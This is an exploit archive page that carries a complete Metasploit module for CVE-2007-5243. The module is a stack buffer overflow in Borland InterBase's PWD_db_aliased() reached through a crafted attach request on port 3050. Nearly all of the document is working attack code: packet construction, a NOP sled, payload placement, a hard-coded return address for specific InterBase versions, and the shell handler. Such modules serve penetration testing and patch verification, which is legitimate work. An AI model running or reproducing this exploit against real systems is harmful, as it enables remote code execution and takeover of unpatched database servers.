Borland InterBase PWD_db_aliased() Buffer Overflow

Borland InterBase PWD_db_aliased() Buffer Overflow: Posted Oct 27, 2009; Authored by Adriano Lima | Site risesecurity.org; This Metasploit module exploits a stack overflow in Borland InterBase by sending a specially crafted attach request.; tags | exploit, overflow; advisories | CVE-2007-5243; SHA-256 | de6fac96fd0b6aa3c602b0926ac2f071a06c826a31b79903cd842f5737f7b63f; Download | Favorite | View

Borland InterBase PWD_db_aliased() Buffer Overflow

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'Borland InterBase PWD_db_aliased() Buffer Overflow',
      'Description'  => %q{
        This module exploits a stack overflow in Borland InterBase
        by sending a specially crafted attach request.
      },
      'Version'  => '$Revision$',
      'Author'  =>
        [
          'ramon',
          'Adriano Lima <adriano@risesecurity.org>',
        ],
      'Arch'    => ARCH_X86,
      'Platform'  => 'linux',
      'References'  =>
        [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38607' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
      'Privileged'  => true,
      'License'  => MSF_LICENSE,
      'Payload'  =>
        {
          'Space' => 512,
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
        },
      'Targets'  =>
        [
          # 0x0804cbe4 pop esi; pop ebp; ret
          [
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
            { 'Ret' => 0x0804cbe4 }
          ],
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(3050)
      ],
      self.class
    )

  end

  def exploit

    connect

    # Attach database
    op_attach = 19

    length = 1152
    remainder = length.remainder(4)
    padding = 0

    if remainder > 0
      padding = (4 - remainder)
    end

    buf = ''

    # Operation/packet type
    buf << [op_attach].pack('N')

    # Id
    buf << [0].pack('N')

    # Length
    buf << [length].pack('N')

    # It will return into this nop block
    buf << make_nops(length - payload.encoded.length - 4)

    # Payload
    buf << payload.encoded

    # Target
    buf << [target.ret].pack('V')

    # Padding
    buf << "\x00" * padding

    # Length
    buf << [1024].pack('N')

    # Random alpha data
    buf << rand_text_alpha(1024)

    sock.put(buf)

    handler

  end

end

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

Borland InterBase PWD_db_aliased() Buffer Overflow

Borland InterBase PWD_db_aliased() Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Borland InterBase PWD_db_aliased() Buffer Overflow

Share This

Borland InterBase PWD_db_aliased() Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems